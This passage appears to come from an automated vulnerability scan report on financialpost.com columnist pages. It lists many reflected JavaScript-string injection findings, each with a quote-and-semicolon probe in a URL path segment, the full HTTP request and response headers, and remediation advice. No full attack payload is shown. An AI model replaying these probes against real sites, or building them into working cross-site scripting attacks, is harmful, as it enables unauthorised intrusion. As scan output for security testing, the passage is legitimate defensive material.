<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion8ad4f';e55a38084cf/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion8ad4f';e55a38084cf;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24013518?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a104'%3b5a547f5c299 was submitted in the REST URL parameter 2. This input was echoed as 3a104';5a547f5c299 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists3a104'%3b5a547f5c299/Retired+forgotten/3996666/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83730
Expires: Sun, 19 Dec 2010 03:14:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists3a104';5a547f5c299/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists3a104';5a547f5c299;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14547920?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60e8'%3bc423016c9ce was submitted in the REST URL parameter 4. This input was echoed as b60e8';c423016c9ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666b60e8'%3bc423016c9ce/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63851
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired-forgotten/3996666b60e8';c423016c9ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired-forgotten;kw=3996666b60e8';c423016c9ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85984'%3b9b5aa3d4cb2 was submitted in the REST URL parameter 5. This input was echoed as 85984';9b5aa3d4cb2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666/85984'%3b9b5aa3d4cb2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37190
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9914'%3b305cc1577f was submitted in the REST URL parameter 1. This input was echoed as a9914';305cc1577f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona9914'%3b305cc1577f/columnists/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44289
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eacd7'%3bd88cefa4959 was submitted in the REST URL parameter 2. This input was echoed as eacd7';d88cefa4959 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistseacd7'%3bd88cefa4959/barry-critchley.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f40'%3b40381cfea5e was submitted in the REST URL parameter 3. This input was echoed as 29f40';40381cfea5e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/29f40'%3b40381cfea5e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43401
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4697c'%3b898f841844e was submitted in the REST URL parameter 1. This input was echoed as 4697c';898f841844e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion4697c'%3b898f841844e/columnists/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d524b'%3be3824be34be was submitted in the REST URL parameter 2. This input was echoed as d524b';e3824be34be in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsd524b'%3be3824be34be/diane-francis.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43436
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15cd'%3b24a7cbbec0f was submitted in the REST URL parameter 3. This input was echoed as c15cd';24a7cbbec0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/c15cd'%3b24a7cbbec0f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44221
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b9'%3bda5ddd2e310 was submitted in the REST URL parameter 1. This input was echoed as 204b9';da5ddd2e310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion204b9'%3bda5ddd2e310/columnists/garry-marr.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43441
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6548'%3b3159e915d61 was submitted in the REST URL parameter 2. This input was echoed as f6548';3159e915d61 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsf6548'%3b3159e915d61/garry-marr.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37562
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc04b'%3bdce0ac574b1 was submitted in the REST URL parameter 3. This input was echoed as cc04b';dce0ac574b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/cc04b'%3bdce0ac574b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43402
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2f'%3b0c9133db820 was submitted in the REST URL parameter 1. This input was echoed as 88d2f';0c9133db820 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion88d2f'%3b0c9133db820/columnists/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37637
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed13'%3b43d2ce6bccf was submitted in the REST URL parameter 2. This input was echoed as 4ed13';43d2ce6bccf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists4ed13'%3b43d2ce6bccf/jamie-golombek.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b393c'%3b95d66bbad15 was submitted in the REST URL parameter 3. This input was echoed as b393c';95d66bbad15 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/b393c'%3b95d66bbad15 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44222
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8854'%3b3c5e10ffaf8 was submitted in the REST URL parameter 1. This input was echoed as a8854';3c5e10ffaf8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona8854'%3b3c5e10ffaf8/columnists/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43512
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca10'%3bd81b1ae580f was submitted in the REST URL parameter 2. This input was echoed as 1ca10';d81b1ae580f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists1ca10'%3bd81b1ae580f/jonathan-chevreau.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37632
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1e72'%3bc945c59c0e9 was submitted in the REST URL parameter 3. This input was echoed as f1e72';c945c59c0e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/f1e72'%3bc945c59c0e9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d26'%3b3b9f28c8209 was submitted in the REST URL parameter 1. This input was echoed as c8d26';3b9f28c8209 in the application's response.
